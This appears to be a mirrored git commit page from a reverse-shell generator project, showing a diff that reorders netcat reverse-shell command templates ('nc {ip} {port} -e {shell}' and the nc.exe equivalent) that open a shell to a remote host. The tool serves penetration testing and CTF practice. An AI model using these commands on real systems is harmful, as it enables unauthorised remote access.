mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2024-12-19 11:26:10 +00:00
Merge pull request #103 from SafaSafari/SafaSafari-patch-1
nc -e parameter must be last :))
This commit is contained in:
commit
0e5fe41447
@ -52,12 +52,12 @@ const reverseShellCommands = withCommandType(
|
||||
},
|
||||
{
|
||||
"name": "nc -e",
|
||||
"command": "nc -e {shell} {ip} {port}",
|
||||
"command": "nc {ip} {port} -e {shell}",
|
||||
"meta": ["linux", "mac"]
|
||||
},
|
||||
{
|
||||
"name": "nc.exe -e",
|
||||
"command": "nc.exe -e {shell} {ip} {port}",
|
||||
"command": "nc.exe {ip} {port} -e {shell}",
|
||||
"meta": ["windows"]
|
||||
},
|
||||
{
|
||||
|
Loading…
Reference in New Issue
Block a user